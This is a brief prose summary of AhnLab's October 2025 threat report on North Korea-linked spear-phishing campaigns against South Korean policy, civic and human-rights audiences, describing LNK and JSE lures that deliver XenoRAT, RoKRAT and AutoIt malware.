AhnLab’s October 2025 South Korea APT trend report says spear phishing remained the dominant initial-access method, with JSE-based attacks increasing and accounting for the largest share that month. The DPRK-relevant material includes LNK lures using North Korea, inter-Korean cooperation, unification, and policy themes to deliver RAT malware such as XenoRAT and RoKRAT. One LNK pattern runs malicious PowerShell, abuses Dropbox API or Google Drive to retrieve payloads, creates additional scripts and obfuscated RAT components, and enables attacker-directed actions including keylogging and screenshot capture. Another pattern downloads AutoIt malware, copies curl.exe under a different name, registers persistence through Task Scheduler, and supports command execution, directory search, file upload, and file download. The filenames and decoy documents show targeting aligned with South Korean policy, civic, tax, human-rights, and North Korea-related audiences.